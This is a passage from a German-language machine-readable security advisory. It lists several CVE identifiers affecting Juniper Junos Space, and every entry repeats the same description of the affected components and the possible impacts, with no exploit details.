"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-12363"
},
{
"cve": "CVE-2020-12364",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-12364"
},
{
"cve": "CVE-2020-1927",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-1927"
},
{
"cve": "CVE-2020-1934",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-1934"
},
{
"cve": "CVE-2020-24489",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-24489"
},
{
"cve": "CVE-2020-24511",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-24511"
},
{
"cve": "CVE-2020-24512",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-24512"
},
{
"cve": "CVE-2020-27170",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-27170"
},
{
"cve": "CVE-2020-27777",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-27777"
},
{
"cve": "CVE-2020-29443",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-29443"
},
{
"cve": "CVE-2020-8625",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-8625"
},
{
"cve": "CVE-2020-8648",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-8648"
},
{
"cve": "CVE-2020-8695",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-8695"
},
{
"cve": "CVE-2020-8696",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-8696"
},
{
"cve": "CVE-2020-8698",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-8698"
},
{
"cve": "CVE-2020-9490",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-9490"
},
{
"cve": "CVE-2021-20254",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-20254"
},
{
"cve": "CVE-2021-22555",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-22555"
},
{
"cve": "CVE-2021-22901",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-22901"
},
{
"cve": "CVE-2021-2341",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2341"
},
{
"cve": "CVE-2021-2342",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2342"
},
{
"cve": "CVE-2021-2356",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2356"
},
{
"cve": "CVE-2021-2369",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2369"
},
{
"cve": "CVE-2021-2372",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2372"
},
{
"cve": "CVE-2021-2385",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2385"
},
{
"cve": "CVE-2021-2388",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2388"
},
{
"cve": "CVE-2021-2389",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2389"
},
{
"cve": "CVE-2021-2390",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-2390"
},
{
"cve": "CVE-2021-25214",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-25214"
},
{
"cve": "CVE-2021-25217",
"notes": [
{
"category": "description",
